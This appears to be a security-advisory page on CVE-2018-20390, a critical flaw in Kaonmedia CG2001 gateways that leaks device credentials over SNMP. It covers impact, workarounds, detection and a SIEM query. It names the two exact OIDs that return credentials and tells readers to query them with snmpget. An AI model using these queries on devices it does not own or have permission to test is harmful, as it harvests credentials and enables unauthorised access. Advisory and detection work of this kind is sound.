CVE-2018-20390 – This vulnerability allows remote attackers to r... (How to Fix)

Q: What is the severity of CVE-2018-20390?

CVE-2018-20390 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows remote attackers to retrieve device credentials via specific SNMP OID requests. It affects Kaonmedia CG2001-AN22A, CG2001-UDBNA, and CG2001-UN2NA devices running vulnerable firmware versions. Attackers can obtain authentication credentials without authentication.

📋 TL;DR

This vulnerability allows remote attackers to retrieve device credentials via specific SNMP OID requests. It affects Kaonmedia CG2001-AN22A, CG2001-UDBNA, and CG2001-UN2NA devices running vulnerable firmware versions. Attackers can obtain authentication credentials without authentication.

💻 Affected Systems

Products:

Kaonmedia CG2001-AN22A
Kaonmedia CG2001-UDBNA
Kaonmedia CG2001-UN2NA

Versions: CG2001-AN22A 1.2.1, CG2001-UDBNA 3.0.8, CG2001-UN2NA 3.0.8

Operating Systems: Embedded firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in default SNMP configuration that exposes sensitive OIDs.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise leading to network infiltration, data theft, and potential use as pivot point for lateral movement.

🟠

Likely Case

Credential theft enabling unauthorized access to device management interfaces and configuration changes.

🟢

If Mitigated

Limited to credential exposure if SNMP access is restricted, but still represents significant information disclosure.

🌐 Internet-Facing: HIGH - Devices exposed to internet can be scanned and exploited remotely without authentication.

🏢 Internal Only: HIGH - Internal attackers or malware can easily exploit this to gain credentials and escalate privileges.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Simple SNMP GET requests to specific OIDs (iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0) return credentials. Public proof-of-concept scripts exist.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No vendor advisory found

Restart Required: No

Instructions:

No official patch available. Check with Kaonmedia for firmware updates. Consider replacing devices if no fix is provided.

🔧 Temporary Workarounds

Disable SNMP or Restrict Access

all

Disable SNMP service entirely or configure SNMP access controls to restrict which hosts can query the device.

# Configuration varies by device - check device web interface or CLI for SNMP settings

Change SNMP Community Strings

all

Change default SNMP community strings to strong, unique values and use SNMPv3 with authentication.

# Use device management interface to change SNMP community strings

🧯 If You Can't Patch

Isolate affected devices in separate VLAN with strict firewall rules blocking SNMP traffic (UDP 161) from untrusted networks.
Implement network monitoring to detect SNMP queries to the vulnerable OIDs and alert on credential exposure attempts.

🔍 How to Verify

Check if Vulnerable:

Use snmpwalk or snmpget to query OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0. If they return values, device is vulnerable.

Check Version:

Check device web interface or use SNMP to query system description OIDs (typically 1.3.6.1.2.1.1.1.0)

Verify Fix Applied:

After applying workarounds, verify SNMP queries to vulnerable OIDs return no data or access is denied.

📡 Detection & Monitoring

Log Indicators:

SNMP authentication failures
Unusual SNMP query patterns
Access from unexpected IP addresses to SNMP port

Network Indicators:

SNMP queries to iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 or iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 OIDs
High volume of SNMP traffic to specific devices

SIEM Query:

source_port=161 AND (oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0" OR oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")

📊 Metadata

CVE ID: CVE-2018-20390

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-522

Published: December 23, 2018

Last Updated: November 21, 2024

🔗 References

https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv Third Party Advisory
https://misteralfa-hack.blogspot.com/2018/12/stringbleed-y-ahora-que-passwords-leaks.html Exploit,Third Party Advisory
https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv Third Party Advisory
https://misteralfa-hack.blogspot.com/2018/12/stringbleed-y-ahora-que-passwords-leaks.html Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2018-20390, you might also want to check these: